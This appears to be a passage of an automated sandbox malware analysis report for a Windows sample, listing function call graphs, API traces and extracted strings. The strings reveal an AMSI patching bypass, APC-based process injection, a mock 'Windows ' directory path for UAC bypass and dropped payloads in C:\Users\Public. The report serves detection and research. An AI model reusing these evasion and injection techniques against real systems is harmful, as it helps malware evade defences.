28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f7e5c 4780->4788 5046 2919818-2919aea call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 290e358 call 28f4530 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4de0 * 2 call 28f4764 call 290dc8c 4788->5046 5047 2919aef-2919cf0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f49f8 call 2908d70 4788->5047 4797->4798 4899 2918880-2918ba0 call 28f49f8 call 290de50 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 290d164 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 4798->4899 4900 291887b-291887e 4798->4900 5217 2918ba2-2918bb4 call 2908730 4899->5217 5218 2918bb9-291939c call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 ResumeThread call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 CloseHandle call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 2908080 call 290894c * 6 CloseHandle call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 4899->5218 4900->4899 5046->5047 5047->4779 5217->5218 5218->4689
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A6B7E0,02A6B824,OpenSession,02977380,0291B7B8,UacScan,02977380), ref: 029186E9
                                                          • ResumeThread.KERNEL32(00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8), ref: 02918D33
                                                            • Part of subcall function 02908730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02908761
                                                          • CloseHandle.KERNEL32(00000898,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,00000880,ScanBuffer,02977380,0291B7B8,OpenSession,02977380), ref: 02918EB2
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • CloseHandle.KERNEL32(00000898,00000898,ScanBuffer,02977380,0291B7B8,UacInitialize,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380), ref: 029192A4
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 0290DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                            • Part of subcall function 0290DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                            • Part of subcall function 0290DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                            • Part of subcall function 0290DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                            • Part of subcall function 02908338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,Initialize,02977380,0291B7B8,00000000,00000000,00000000,ScanString,02977380,0291B7B8), ref: 0291B2FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                          • API String ID: 2961332323-3516509641
                                                          • Opcode ID: 8c24e894eb3a9a7e3b7fd534bc5d069f1de5bc0e150b3fb78bef48dc1d9bd537
                                                          • Instruction ID: 5acd7abd846d587d2c65e8a47d5222764900eccf368c34b383505d2362d13297
                                                          • Opcode Fuzzy Hash: 8c24e894eb3a9a7e3b7fd534bc5d069f1de5bc0e150b3fb78bef48dc1d9bd537
                                                          • Instruction Fuzzy Hash: D543EA3DB0821D8FDB50EB68DC909DB73FAEF85304F5040E6A209DB650DA31AE958F56
                                                          Function 02913E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 0290DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DD5E), ref: 0290DCCB
                                                            • Part of subcall function 0290DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DD05
                                                            • Part of subcall function 0290DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DD32
                                                            • Part of subcall function 0290DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DD3B
                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02977380,0291B7B8,UacScan,02977380,0291B7B8,ScanString,02977380,0291B7B8,0291BB30,00000000,00000000,0291BB24,00000000,00000000), ref: 029140CB
                                                            • Part of subcall function 029088B8: LoadLibraryW.KERNEL32(amsi), ref: 029088C1
                                                            • Part of subcall function 029088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02908920
                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacScan,02977380,0291B7B8,000003E8,ScanBuffer,02977380,0291B7B8,UacScan,02977380), ref: 02914277
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • Sleep.KERNEL32(00004E20,UacScan,02977380,0291B7B8,ScanString,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,UacInitialize,02977380,0291B7B8), ref: 029150EE
                                                            • Part of subcall function 0290DC04: RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                            • Part of subcall function 0290DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                            • Part of subcall function 0290DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 029085BC: WinExec.KERNEL32(?,?), ref: 02908624
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                          • API String ID: 2171786310-3926298568
                                                          • Opcode ID: 6b7c80581b235beea5813700c00043efe5a57d795be6aed2126d45e01f548154
                                                          • Instruction ID: 947ac00978219be6c8778b7d5994085115c0fca30f9c8694535310c850d17292
                                                          • Opcode Fuzzy Hash: 6b7c80581b235beea5813700c00043efe5a57d795be6aed2126d45e01f548154
                                                          • Instruction Fuzzy Hash: F343F83DB0425D8FEB50EB68DC90A9F73B6BF85304F1040E29609EB650DE70AE859F56
                                                          Function 0290E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 9257 290e678-290e67c 9258 290e681-290e686 9257->9258 9258->9258 9259 290e688-290ec81 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4740 * 2 call 28f4860 call 28f4778 call 28f30d4 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4740 call 28f7f2c call 28f49a0 call 28f4d74 call 28f4df0 call 28f4740 call 28f49a0 call 28f4d74 call 28f4df0 call 2908788 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c 9258->9259 9462 290eee2-290ef2f call 28f4500 call 28f4c60 call 28f4500 call 28f4c60 call 28f4500 9259->9462 9463 290ec87-290eedd call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 WaitForSingleObject CloseHandle * 2 call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c call 28f4860 call 28f49a0 call 28f47ec call 28f49a0 call 290894c * 3 9259->9463 9463->9462
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C,OpenSession,02977380), ref: 0290ED6E
                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C,OpenSession), ref: 0290ED76
                                                          • CloseHandle.KERNEL32(00000888,00000000,00000000,000000FF,ScanString,02977380,0290EF4C,OpenSession,02977380,0290EF4C,UacScan,02977380,0290EF4C,ScanBuffer,02977380,0290EF4C), ref: 0290ED7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                          • String ID: )"C:\Users\Public\Libraries\ahhbgzzQ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                          • API String ID: 3475578485-2037326086
                                                          • Opcode ID: c14913eca61be49beb611f706e374e0fd120e7b2d148ba03989e956598848f50
                                                          • Instruction ID: ba6a212c4c08a01851235256db24bbd65cbfcb34e1bd54de92e0de914907eccd
                                                          • Opcode Fuzzy Hash: c14913eca61be49beb611f706e374e0fd120e7b2d148ba03989e956598848f50
                                                          • Instruction Fuzzy Hash: D222CA7CB0015D9FEB50FB68D881B8FB3B6AF85300F1045A2A745EB294DB70AE458F56
                                                          Function 028F1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 11426 28f1724-28f1736 11427 28f173c-28f174c 11426->11427 11428 28f1968-28f196d 11426->11428 11431 28f174e-28f175b 11427->11431 11432 28f17a4-28f17ad 11427->11432 11429 28f1973-28f1984 11428->11429 11430 28f1a80-28f1a83 11428->11430 11433 28f1938-28f1945 11429->11433 11434 28f1986-28f19a2 11429->11434 11436 28f1a89-28f1a8b 11430->11436 11437 28f1684-28f16ad VirtualAlloc 11430->11437 11438 28f175d-28f176a 11431->11438 11439 28f1774-28f1780 11431->11439 11432->11431 11435 28f17af-28f17bb 11432->11435 11433->11434 11445 28f1947-28f195b Sleep 11433->11445 11440 28f19a4-28f19ac 11434->11440 11441 28f19b0-28f19bf 11434->11441 11435->11431 11442 28f17bd-28f17c9 11435->11442 11443 28f16df-28f16e5 11437->11443 11444 28f16af-28f16dc call 28f1644 11437->11444 11446 28f176c-28f1770 11438->11446 11447 28f1794-28f17a1 11438->11447 11448 28f1782-28f1790 11439->11448 11449 28f17f0-28f17f9 11439->11449 11450 28f1a0c-28f1a22 11440->11450 11451 28f19d8-28f19e0 11441->11451 11452 28f19c1-28f19d5 11441->11452 11442->11431 11453 28f17cb-28f17de Sleep 11442->11453 11444->11443 11445->11434 11457 28f195d-28f1964 Sleep 11445->11457 11454 28f182c-28f1836 11449->11454 11455 28f17fb-28f1808 11449->11455 11462 28f1a3b-28f1a47 11450->11462 11463 28f1a24-28f1a32 11450->11463 11459 28f19fc-28f19fe call 28f15cc 11451->11459 11460 28f19e2-28f19fa 11451->11460 11452->11450 11453->11431 11458 28f17e4-28f17eb Sleep 11453->11458 11464 28f18a8-28f18b4 11454->11464 11465 28f1838-28f1863 11454->11465 11455->11454 11461 28f180a-28f181e Sleep 11455->11461 11457->11433 11458->11432 11469 28f1a03-28f1a0b 11459->11469 11460->11469 11461->11454 11471 28f1820-28f1827 Sleep 11461->11471 11475 28f1a49-28f1a5c 11462->11475 11476 28f1a68 11462->11476 11463->11462 11472 28f1a34 11463->11472 11467 28f18dc-28f18eb call 28f15cc 11464->11467 11468 28f18b6-28f18c8 11464->11468 11473 28f187c-28f188a 11465->11473 11474 28f1865-28f1873 11465->11474 11487 28f18fd-28f1936 11467->11487 11491 28f18ed-28f18f7 11467->11491 11478 28f18cc-28f18da 11468->11478 11479 28f18ca 11468->11479 11471->11455 11472->11462 11482 28f188c-28f18a6 call 28f1500 11473->11482 11483 28f18f8 11473->11483 11474->11473 11481 28f1875 11474->11481 11477 28f1a6d-28f1a7f 11475->11477 11484 28f1a5e-28f1a63 call 28f1500 11475->11484 11476->11477 11478->11487 11479->11478 11481->11473 11482->11487 11483->11487 11484->11477
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,028F1FC1), ref: 028F17D0
                                                          • Sleep.KERNEL32(0000000A,00000000,?,028F1FC1), ref: 028F17E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 3d82bec10518446a4c0f6a35c6a6498bb83fe99ff171641165d70dc4bd178faf
                                                          • Instruction ID: 108eedd839c46c5f21c77f5b33007e2a30dbdd72528c6070de02c6811806eaa4
                                                          • Opcode Fuzzy Hash: 3d82bec10518446a4c0f6a35c6a6498bb83fe99ff171641165d70dc4bd178faf
                                                          • Instruction Fuzzy Hash: 07B1307EA05340CBCB55CF68D888321BBF1EB86325F1986AAD64DCB386C7309465CB91
                                                          Function 029088B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryW.KERNEL32(amsi), ref: 029088C1
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02908920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                          • String ID: DllGetClassObject$W$amsi
                                                          • API String ID: 941070894-2671292670
                                                          • Opcode ID: 11d1203213038b62e66b751a7759d8023dab7ba946693674731901a15ae87a99
                                                          • Instruction ID: 5304492c24857255eb4112d83a6ecb6708013a8ebde0444ee7e4d5db95f466f8
                                                          • Opcode Fuzzy Hash: 11d1203213038b62e66b751a7759d8023dab7ba946693674731901a15ae87a99
                                                          • Instruction Fuzzy Hash: 4BF0815054C385BDD200E2B88C89F4BBBCD4BA2264F008A18B1A89A2D2D679D1458777
                                                          Function 028F1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
